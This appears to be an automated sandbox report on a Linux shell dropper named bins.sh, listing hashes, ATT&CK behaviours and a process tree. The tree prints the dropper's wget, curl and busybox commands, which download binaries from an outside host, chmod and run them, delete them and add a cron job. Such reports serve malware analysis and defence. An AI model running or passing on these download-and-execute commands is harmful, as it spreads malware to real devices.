Analysis
-
max time kernel
150s -
max time network
153s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
05/12/2024, 07:52
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
4ec351f49dc5766e37b9f2ca107ea79f
-
SHA1
1e9e758cc6d6441d23748b0a346dcfc1df30e105
-
SHA256
c4ffcebc0d441088029827d34c8dea73194328becf29e50825d908b5b2f5d661
-
SHA512
5371efb6490ae01946e723c37b09df490d54cc86f0b773d9b3121e608345aca8f92c18f149031f0380cca92eb021bf656abe984568c20fbe7a135211af49e60c
-
SSDEEP
192:8cfVNYb3Tjdl4z596v3m8MJeyct+8CB596v3w8MJeyhlI0VNYb3TS:8cydl1t+8ulIm
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 718 chmod 684 chmod 700 chmod 706 chmod 712 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB 685 zZM090BtLw96clc18K3325Bi3InWJUorwB -
Renames itself 1 IoCs
pid Process 686 zZM090BtLw96clc18K3325Bi3InWJUorwB -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.nFADI4 crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/265/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/692/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/699/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/716/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/789/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/824/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/12/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/27/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/783/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/835/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/902/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/17/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/645/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/702/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/780/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/25/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/650/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/844/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/862/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/863/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/891/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/710/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/792/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/867/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/290/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/451/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/802/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/871/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/882/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/self/auxv curl File opened for reading /proc/1/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/812/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/872/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/724/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/786/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/738/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/781/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/813/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/877/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/886/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/887/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/893/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/731/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/906/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/720/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/745/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/330/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/840/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/744/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/787/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/810/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/859/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/402/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/717/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/14/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/726/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/260/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/774/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/861/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/794/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/836/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/23/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB File opened for reading /proc/740/cmdline zZM090BtLw96clc18K3325Bi3InWJUorwB -
System Network Configuration Discovery 1 TTPs 16 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 717 busybox 698 curl 709 wget 699 busybox 666 curl 683 busybox 710 curl 715 wget 716 curl 697 wget 703 wget 705 busybox 711 busybox 722 wget 660 wget 704 curl -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:652
-
/bin/rm/bin/rm bins.sh2⤵PID:654
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵
- System Network Configuration Discovery
PID:660
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:666
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵
- System Network Configuration Discovery
PID:683
-
-
/bin/chmodchmod 777 zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵
- File and Directory Permissions Modification
PID:684
-
-
/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB./zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:685 -
/bin/shsh -c "crontab -l"3⤵PID:687
-
/usr/bin/crontabcrontab -l4⤵PID:689
-
-
-
/bin/shsh -c "crontab -"3⤵PID:690
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:691
-
-
-
-
/bin/rmrm zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵PID:694
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG2⤵
- System Network Configuration Discovery
PID:697
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG2⤵
- System Network Configuration Discovery
PID:698
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG2⤵
- System Network Configuration Discovery
PID:699
-
-
/bin/chmodchmod 777 ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG2⤵
- File and Directory Permissions Modification
PID:700
-
-
/tmp/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG./ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG2⤵PID:701
-
-
/bin/rmrm ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG2⤵PID:702
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c92⤵
- System Network Configuration Discovery
PID:703
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c92⤵
- System Network Configuration Discovery
PID:704
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c92⤵
- System Network Configuration Discovery
PID:705
-
-
/bin/chmodchmod 777 OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c92⤵
- File and Directory Permissions Modification
PID:706
-
-
/tmp/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9./OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c92⤵PID:707
-
-
/bin/rmrm OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c92⤵PID:708
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX2⤵
- System Network Configuration Discovery
PID:709
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX2⤵
- System Network Configuration Discovery
PID:710
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX2⤵
- System Network Configuration Discovery
PID:711
-
-
/bin/chmodchmod 777 Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX2⤵
- File and Directory Permissions Modification
PID:712
-
-
/tmp/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX./Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX2⤵PID:713
-
-
/bin/rmrm Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX2⤵PID:714
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS2⤵
- System Network Configuration Discovery
PID:715
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS2⤵
- System Network Configuration Discovery
PID:716
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS2⤵
- System Network Configuration Discovery
PID:717
-
-
/bin/chmodchmod 777 Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS2⤵
- File and Directory Permissions Modification
PID:718
-
-
/tmp/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS./Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS2⤵PID:719
-
-
/bin/rmrm Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS2⤵PID:720
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jycs76M6vBIZ1GmDmLy0gXM9o11CS79Z9O2⤵
- System Network Configuration Discovery
PID:722
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
210B
MD55e8eb0b39864e53b859bcdcaeb4dbe6a
SHA1c8116483ad132a21e500bb5087c53996ed66334c
SHA2566f0768d965338cb7d3061fcc41810df84bd23d8978a6e186fe996b33e6ae37e7
SHA5124338d28aba1567ee8022a74e0d80020daaeea88b4d026c36fbb9e395e7e9d4a511073e94a018afe1863248585fe7f413d09ccff177f6b41c24ff829d746a0820